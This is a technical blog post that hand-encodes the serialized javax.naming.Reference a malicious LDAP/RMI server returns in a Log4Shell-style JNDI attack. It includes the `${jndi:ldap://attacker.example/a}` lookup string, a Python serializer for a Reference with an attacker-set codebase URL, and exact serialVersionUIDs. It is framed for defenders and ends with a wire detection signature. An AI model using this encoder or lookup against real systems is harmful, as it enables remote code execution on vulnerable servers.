What is a JNDI Reference in a Log4Shell-style attack?

A javax.naming.Reference is the Java object a malicious LDAP or RMI server returns when a vulnerable app performs a JNDI lookup. If its classFactoryLocation points to an attacker-controlled codebase URL and the JVM trusts remote codebases, the JVM fetches and instantiates that factory class, which is the remote code execution.

Why does serialVersionUID matter in a JNDI deserialization payload?

serialVersionUID is a 64-bit fingerprint of the class. If the value in the serialized stream doesn't exactly match the victim's Reference class, deserialization throws InvalidClassException and aborts before it ever reaches the payload. The bytes must be exact, so it's safest to encode the UID from the signed long rather than a hand-copied hex constant.

Why do Java field type signatures use slashes but array class names use dots?

A field type signature uses the JVM field-descriptor form with slashes ([Ljava/lang/Object;), while an array object's class descriptor name uses whatever Class.getName() returns, which for array classes uses dots ([Ljava.lang.Object;). The read side calls Class.forName() on it, so spelling the array's classdesc with slashes causes a ClassNotFoundException.

Hand-rolling the JNDI Reference: what the JVM actually deserializes

Q: How can you detect a malicious JNDI response on the wire?

Look for a Java serialization stream starting with the magic bytes AC ED 00 05, a TC_CLASSDESC named javax.naming.Reference, and a classFactoryLocation string carrying an LDAP or HTTP URL you don't control. Legitimate traffic almost never ships a Reference with a remote codebase over an untrusted channel, so the false-positive rate is low.

Quick note before we start: this is about the wire format, for defenders and people doing authorized testing. There’s no turnkey exploit here, no gadget chain, nothing you can copy-paste to pop a box. The point is to know what the bytes look like so you can spot them.

You’ve seen the Log4Shell string a hundred times:

${jndi:ldap://attacker.example/a}

And you’ve probably read the stock explanation that goes with it: the server does a JNDI lookup, the attacker’s LDAP server hands back a reference to a remote class, and the JVM downloads and runs it.

That’s technically true, and I’ve never found it useful. It skips the only part that’s actually interesting: the whole attack hinges on one object that the victim JVM deserializes, and that object has to be byte-perfect or nothing happens at all — it just quietly fails and you’re left wondering why.

So I decided to build the server side of it myself. No JNDI, no RMI library, not even ObjectOutputStream — just a byte buffer and the spec. I figured I understood the format. Turns out there’s a real gap between “I read the spec” and “a real JVM accepts it,” and that gap cost me two bugs I never would have caught without running the bytes through an actual JVM.

This post is that object, byte for byte, including both bugs.

The setup: who serializes what

When a vulnerable app calls ctx.lookup("ldap://you/a") (or rmi://you/a), your malicious directory server gets to return exactly one thing: a serialized Java object. If that object happens to be a javax.naming.Reference with a classFactoryLocation set to a codebase URL, and the victim is running with com.sun.jndi.ldap.object.trustURLCodebase=true (which was the default on old JDKs, before the patches), then NamingManager.getObjectInstance fetches the factory class from your URL and instantiates it. That instantiation is the RCE. That’s the whole game.

So the entire server-side payload boils down to one job: emit a serialized javax.naming.Reference whose className, classFactory, and classFactoryLocation are yours.

Now, you could absolutely shell out to ysoserial or stand up a real LDAP server and let it do this for you. I didn’t want to. Partly it’s the no-dependencies thing, but mostly it’s that you can’t really detect or explain something you can only produce by calling a library that hides all the interesting bits from you. If I’m going to write a detection signature for this, I want to have typed the bytes myself. Here’s what that takes.

The Java serialization stream, in just enough detail

A serialized stream starts with a 4-byte header:

AC ED 00 05      STREAM_MAGIC (0xACED) + STREAM_VERSION (0x0005)

After that it’s a sequence of typed records. Here are the only ones we care about:

Marker	Byte	Meaning
`TC_OBJECT`	`0x73`	a new object follows (its class desc, then field values)
`TC_CLASSDESC`	`0x72`	a class descriptor: name, serialVersionUID, flags, fields
`TC_STRING`	`0x74`	a string (2-byte length + modified-UTF-8)
`TC_ARRAY`	`0x75`	an array object
`TC_ENDBLOCKDATA`	`0x78`	end of a class’s optional block data
`TC_NULL`	`0x70`	null (e.g. “no superclass”)

An object on the wire looks like this: TC_OBJECT, then a class descriptor (the class name, plus serialVersionUID, plus flags, plus the ordered list of field declarations, plus a null meaning “no superclass”), and then the field values in the exact order the descriptor declared them. Strings normally get written once and then back-referenced later with TC_REFERENCE by handle number, which is great for size but miserable to hand-encode. If you just emit every string fresh as its own TC_STRING, the handle numbering stops mattering and your bytes become self-contained. That’s the one trick that makes doing this by hand bearable: never back-reference, always emit fresh.

javax.naming.Reference, field by field Reference declares four serializable fields. The JVM doesn’t serialize them in declaration order — it uses a canonical order: primitives first, then objects, and each group sorted alphabetically. Reference has no primitive fields, so for us that just means four objects in alphabetical order:

addrs                 Vector       (the RefAddr list; must NOT be null)
classFactory          String       (the factory class name)
classFactoryLocation  String       (the codebase URL — the payload)
className              String       (the class to instantiate)

So the class descriptor is:

72                                  TC_CLASSDESC
00 16 "javax.naming.Reference"      class name (2-byte len + UTF-8)
E8 C6 9E A2 A8 E9 8D 09             serialVersionUID
02                                  flags = SC_SERIALIZABLE
00 04                               4 fields
  4C 00 05 "addrs"                 'L' obj field, name "addrs"
    74 00 12 "Ljava/util/Vector;"  field type signature
  4C 00 0C "classFactory"
    74 00 12 "Ljava/lang/String;"
  4C 00 14 "classFactoryLocation"
    74 00 12 "Ljava/lang/String;"
  4C 00 09 "className"
    74 00 12 "Ljava/lang/String;"
78 70                               TC_ENDBLOCKDATA, TC_NULL (no superclass)

Then come the field values, in that same order: the addrs Vector first, then three TC_STRINGs for factory, codebase, and className. Here it is in Python, emitting the raw bytes:

def serialize_reference(class_name, factory, codebase):
    cd  = bytes([TC_CLASSDESC]) + _utf("javax.naming.Reference") + _REFERENCE_SUID
    cd += bytes([SC_SERIALIZABLE]) + (4).to_bytes(2, "big")
    cd += _obj_field("addrs", "Ljava/util/Vector;")
    cd += _obj_field("classFactory", "Ljava/lang/String;")
    cd += _obj_field("classFactoryLocation", "Ljava/lang/String;")
    cd += _obj_field("className", "Ljava/lang/String;")
    cd += bytes([TC_ENDBLOCKDATA, TC_NULL])

    obj  = bytes([TC_OBJECT]) + cd
    obj += _empty_vector()          # addrs
    obj += _tc_string(factory)      # classFactory
    obj += _tc_string(codebase)     # classFactoryLocation
    obj += _tc_string(class_name)   # className
    return obj

Looks finished, right? It isn’t. There are two things wrong with the obvious version of this code, and neither one shows up until you feed the bytes to an actual JVM.

Bug #1: the serialVersionUID you can’t eyeball

serialVersionUID is a 64-bit fingerprint for the class. If the value in your stream doesn’t match the victim’s Reference class exactly, deserialization throws InvalidClassException and bails out before it ever looks at your payload. The good news is that Reference declares its UID explicitly in the JDK source, so it’s stable across JDK versions. You just have to get the number right.

My first version had a hex constant that looked right and was completely wrong:

e8 c6 9d 98 ...     WRONG (eyeballed)
e8 c6 9e a2 a8 e9 8d 09   correct  (= -1673475790065791735)

Two bytes off. And here’s the part that stung: my unit test compared the emitted bytes against that same constant, so of course it passed. The test could only ever catch me disagreeing with myself. It had no way to catch me disagreeing with the JVM, which is the only disagreement that matters. The fix is to encode from the signed long directly instead of a hand-copied hex string, so there’s one source of truth:

_REFERENCE_SUID = (-1673475790065791735).to_bytes(8, "big", signed=True)  # e8c69ea2a8e98d09

This is basically the whole reason I wanted to write this up: a test that checks your output against your own assumption isn’t a test. You need something to check against that doesn’t already share your bug.

Bug #2: dots vs. slashes (the one that really hurts)

Reference.addrs has to be a real Vector, not null, because NamingManager.getObjectInstance walks it and throws an NPE if it’s null. So I embed a serialized empty Vector whose elementData is an Object[0]. That Vector carries its own class descriptor, and inside it the element array carries yet another class descriptor of its own. This is where two strings that look identical are actually governed by two different rules:

# Vector.elementData FIELD type signature -> field-descriptor form, SLASHES:
cd += b"\x5b" + _utf("elementData") + _tc_string("[Ljava/lang/Object;")

# ...but the element ARRAY's OWN classdesc name -> Class.getName() form, DOTS:
arr_cd = bytes([TC_CLASSDESC]) + _utf("[Ljava.lang.Object;") + _OBJ_ARRAY_SUID

Same eleven characters, one slash-versus-dot difference, and two different correct answers depending on which one you’re writing:

– A field type signature (the declared type of a field) uses the JVM field-descriptor form: [Ljava/lang/Object;, with slashes.
– An array object’s class descriptor name is whatever Class.getName() returns, because on the read side the JVM calls Class.forName() on it. For array classes that comes out as [Ljava.lang.Object;, with dots.
Spell the array’s classdesc name with slashes and the JVM throws ClassNotFoundException looking for java.lang.Object written with slashes, which is a class that simply doesn’t exist in that form. And naturally my structural test emitted slashes in both spots, because both of them “looked like” the same type string to me. The only thing that caught it was deserializing in a real JVM.

One more while we’re in here: the third UID, the one for [Ljava.lang.Object;, isn’t a declared constant at all. It’s a computed array UID (90ce589f1073296c), and it was the round-trip that finally confirmed I had it right.

The oracle: 20 lines of Java

The fix for “my test shares my bug” is to deserialize the bytes in something that doesn’t share it. The whole validator is throwaway code:

// Check.java — deserialize our hand-emitted bytes in a real JVM and assert the fields.
import java.io.*;
import javax.naming.Reference;

public class Check {
    public static void main(String[] a) throws Exception {
        byte[] bytes = java.nio.file.Files.readAllBytes(java.nio.file.Path.of(a[0]));
        Object o = new ObjectInputStream(new ByteArrayInputStream(bytes)).readObject();
        Reference r = (Reference) o;
        System.out.println("className=" + r.getClassName());
        System.out.println("factory=" + r.getFactoryClassName());
        System.out.println("codebase=" + r.getFactoryClassLocation());
        System.out.println("addrs=" + r.size());   // 0, and crucially not an NPE
    }
}

Dump your bytes to a file with the 4-byte AC ED 00 05 header prepended, then run it through a throwaway container:

docker run --rm -v "$PWD":/w -w /w eclipse-temurin:21 \
  sh -c "javac Check.java && java Check reference.ser"

If it prints your className, factory, and codebase with addrs=0 instead of a stack trace, the bytes are real. That one green run is what moved all three UIDs and the dots-versus-slashes fix from “I’m pretty sure” to “the JVM agrees with me.” I run it after every single change to the serializer, because the in-process structural test still can’t catch a wrong constant, and never will — that’s the whole point.

Detection signature

The upside of doing all this by hand is that now you know exactly what a malicious JNDI response looks like on the wire: a serialization stream starting with AC ED 00 05, a TC_CLASSDESC named javax.naming.Reference, and a classFactoryLocation string carrying an LDAP or HTTP URL you don’t control. That’s a signature you can match in a proxy, a WAF, or an egress monitor, and the false-positive rate is low because nobody legitimately ships a Reference with a remote codebase over an untrusted channel.

Notice that neither of my bugs was in reading the spec. Both were in checking my work. A test that compares your output to your own constant is theater — it feels like verification and verifies nothing. When you’re emitting a format that some other system has to consume, that other system is your only real oracle. “It serializes” and “a JVM will actually deserialize it” are two different claims, and only the second one is worth anything.

To be clear, this Reference path is the clean, educational version. In an actual engagement the workhorse is the raw-bytes route: take a complete serialized gadget stream from ysoserial or marshalsec, strip its 4-byte header, and embed the object body directly. That route is better precisely because it’s JVM-independent and you never have to hand-encode anyone’s serialVersionUID. But I don’t think you really understand what it’s doing until you’ve built the simple object by hand once and watched a JVM accept it.

This is part of a series I’m writing on building OAST infrastructure from scratch — authoritative DNS, multi-protocol callback listeners, a sandboxed Python runtime for the response logic. Next up is the DNS server you need to catch these callbacks in the first place.

The setup: who serializes what#

The Java serialization stream, in just enough detail#

Bug #1: the serialVersionUID you can’t eyeball#

Bug #2: dots vs. slashes (the one that really hurts)#

The oracle: 20 lines of Java#

Detection signature#